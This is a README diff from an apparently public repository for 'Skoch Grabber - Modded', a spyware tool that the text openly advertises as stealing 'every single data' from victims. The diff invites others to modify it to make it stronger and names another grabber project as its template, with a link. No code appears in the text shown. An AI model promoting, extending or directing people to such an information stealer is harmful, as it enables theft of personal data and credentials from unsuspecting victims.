Galaxyfounded-mobile/skochgrabber-mod/README.md

 # SKOCH GRABBER - MODDED

-[✅] Skoch Grabber is a powerful spyware to steal every single data from your victims.
+[✅] Skoch Grabber - Modded is a powerful spyware to steal every single data from your victims.

+[✅] You may mod this project as to make it stronger etc but please leave credits to skoch and me.

 [⚠️] This code uses Blank Grabber as the template.
 It's now been discontinued.
 Check out [here](https://github.com/blank-c/blank-grabber)